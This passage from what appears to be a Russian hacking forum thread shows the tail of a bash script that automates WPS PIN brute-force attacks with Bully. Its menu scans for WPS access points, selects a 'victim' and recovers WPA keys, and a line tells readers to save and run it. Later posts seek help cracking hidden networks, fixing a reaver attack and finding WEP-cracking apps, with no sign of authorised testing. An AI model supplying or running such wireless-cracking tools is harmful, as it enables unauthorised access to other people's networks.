ifconfig $tarjselec up
fi
if [ "$salida" = "m" ]; then
menu
fi
if [ "$salida" = "n" ]; then
  echo ""
echo "        Ждите."
sleep 2
clear
exit
fi
echo "$WIFI карта была успешно извлечена!"
airmon-ng stop $WIFI >/dev/null
fi
  echo ""
echo "        Ждите."
sleep 2
clear
 exit

}

menu() {
# Welcome
echo " #########################################################################################"
echo " #                                                                                      #"
echo " #    ~ Скрипт автоматической атаки на WPS с помощью Bully написан @cristi_28            #"
echo " #    ~ Перевод на русский: 5maks5 [ forum.antichat.ru/member.php?u=136564 ]            #"
echo " #    ~ Раздел беспроводные технологии: [ forum.antichat.ru/forum113.html ]              #"
echo " #    ~ Сайт автора: [ http://lampiweb.com ]; Поддержка: Kali,WifiSlax                  #"
echo " #    ~ Версия: 2.1 (перевод 19.07.14) зависимости: BullyWPS $VERSION                        #"
echo " #                                                                                      #"
echo " #                                                                                      #"
echo " #########################################################################################"
sleep 1
echo "---------------------------------------"
if [ "$InfoAP" = "ON" ]; then
  echo "Информация:"
  echo ""
  echo "              ESSID = $ESSID"
  echo "              Канал = $CHANEL"
  echo "        MAC AP = $BSSID"
  fi
  if [ "$ShowWPA" = "ON" ]; then
  echo "          WPA Key = $WPA_KEY"
  fi
  echo "---------------------------------------"
echo ""
echo " 1) Поиск точек с включенным WPS"
echo ""
echo " 2) Выбрать другую жертву"
echo ""
echo " 3) Подбор WPA с Bully"
echo ""
echo " 4) Подбор WPA без проверки калькулятора "
echo ""
echo " 5) Добавить комманды Bully ( пр: -N -Z , итд. ) "
echo ""
echo " 6) Добавить первые 4 цифры + xxxx"
echo ""
echo " 7) Обновить Bully"
echo ""
echo " 8) Обновить MACChanger"
echo ""
echo " 0) Выход"
echo ""
read -p " #> " CHOISE
echo ""
case $CHOISE in
  1 ) WashScan;;
  2 ) SeleccionarObjetivo;;
  3 ) ObtenerWPA_con_pin_o_no;;
  4 ) ObtenerWPA;;
  5 ) optional_functions;;
  6 ) Primer_pin;;
  7 ) bully_update;;
  8 ) macchanger_update;;
  0 ) DESMONTAR_tarj_y_salir;;
  * ) echo "Неверно выбранный пункт!"; menu;;
esac
}

# User check
if [ "$(whoami)" != "root" ]; then
 echo -e '\e[1;31m

    ¡¡¡ Запуск возможен только от root !!!

        Проверка: sudo $0

\e[0m'

 exit 1
fi

# Create directories if they do not exist
if [ ! -d $TMP ]; then mkdir -p $TMP; else rm -rf $TMP/*; fi
if [ ! -d $KEYS ]; then mkdir -p $KEYS; fi
if [ -d $HOME/Desktop/Wireless-Keys ]; then
  if [ ! -d $HOME/Desktop/Wireless-Keys/$SCRIPT-keys ]; then
    ln -s $KEYS $HOME/Desktop/Wireless-Keys/$SCRIPT-keys
  fi
fi

# Eliminating interfaces in monitor
interfaces=$(ifconfig|awk '/^mon/ {print $1}')
if [ "$interfaces" != "" ]; then
  for monx in $interfaces; do
    airmon-ng stop $monx up >/dev/null 2>&1
  done
fi

menu

Сохранить в файл bully.sh и запускать с консоли.

Zheka 22.10.2016 17:18

Кто подскажет, как взломать скрытую сеть?

komicadze 27.12.2016 12:20

Бью точку reaver ом на 90.91% trying pin выдаёт одно и тоже значение 99985677. В строке прописано reaver -I mom -b мак его -c 4 -p vc -a -5 поможите браузер дальше запустить

maus 27.12.2016 16:20

Цитата:

Сообщение от komicadze

Бью точку reaver ом на 90.91% trying pin выдаёт одно и тоже значение 99985677. В строке прописано reaver -I mom -b мак его -c 4 -p vc -a -5 поможите браузер дальше запустить


- здесь собраны ошибки ищи: https://code.google.com/archive/p/reaver-wps/issues

vadyok 13.04.2017 09:12

Знатоки, пожалуйста подскажите, тема еще актуальная? Хочу взломать точки доступа с wps. Пробовал WiFiSlax64-1.0 с GOYScriptWPS (вскрыл две точки, но сигнал слабый) и Wifite2 - не вскрыл ни одной точки. Еще пробовал AirSlax 5.13 Base, тоже без результатно. Под Windows пробовал Dumpper и Wireless Air Cut - не вскрыли ни одну точку. Есть ли смысл пробовать Wifiway и с чего в ней лучше начать. Ей надо, чтобы на точке wps был включен или без разницы? Подскажите пожалуйста.

Andrey9999 13.04.2017 10:29

Wifiway - это древняя версия WiFiSlax'а

vadyok 13.04.2017 11:15

Цитата:

Сообщение от Andrey9999

Wifiway - это древняя версия WiFiSlax'а


Спасибо, большое за ответ. Сэкономили мне время.

antis17 19.06.2017 21:47

Если кому интересно, то появился Wifiway 3.5.

http://foro.seguridadwireless.net/live-cd-wifiway/liberada-livecd-wifiway-3-5-version-final/

GeNT78 05.07.2017 20:48

Кто нибудь устанавливал Wifiway 3.5 ? Что нового? Или стоит остановиться на WifiSlax'е

valyat2 30.07.2017 11:19

Интересует программа wifite 2 или по другому

vega.py v6.1 или выше версия

есть ли у кого то новая версия от автора:

?

glestwid 15.08.2017 02:39

Подскажите, а есть какое-то приложение под Андроид >= 4 для подбора WEP? Именно специализированное для WEP.


Время: 03:01